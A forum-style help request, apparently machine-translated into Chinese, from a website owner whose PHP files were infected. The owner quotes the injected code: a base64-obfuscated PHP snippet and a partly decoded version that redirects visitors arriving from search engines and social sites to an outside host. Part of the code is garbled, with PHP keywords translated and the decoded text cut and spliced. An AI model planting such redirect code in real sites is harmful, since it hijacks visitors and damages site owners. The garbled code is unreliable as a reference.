今年 2 月 14 日,我的网站受到了一些恶意软件代码的攻击,这些恶意软件代码在 2 月 29 日谷歌采取行动后引起了我的注意,但是所有 php 文件在检查时都受到了恶意代码的影响,我得到了以下代码
回声 base64_decode("/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9");
在解码它变成
错误报告(0);$qazplm = headers_sent(); if (!$qazplm) { $referer = $_SERVER['HTTP_REFERER']; $uag = $_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "gogo") or stristr( $referer, "live.com") 或 stristr($referer, "aport") 或 stristr($referer, "nigma") 或 stristr($referer, "webalta") 或 stristr($referer, "begun.ru" ) 或 stristr($referer, "stumbleupon.com") 或 stristr($referer, "bit.ly") 或 stristr($referer, "tinyurl.com") 或 preg_match("/yandex.ru/yandsearch\?( .*?)\&lr\=/", $referer) 或 preg_match("/google.(.*?)/url/",http://namesti.bee.pl/ "); exit(); } } } }
我不知道它是如何进入我的服务器的,但是所有 php 文件都已生效,但其他文件都很好。整个网站现在都关闭了。我只想知道它会造成多大的伤害以及这段代码到底做了什么。我怎样才能检测到它。它是在特定时间执行的脚本吗?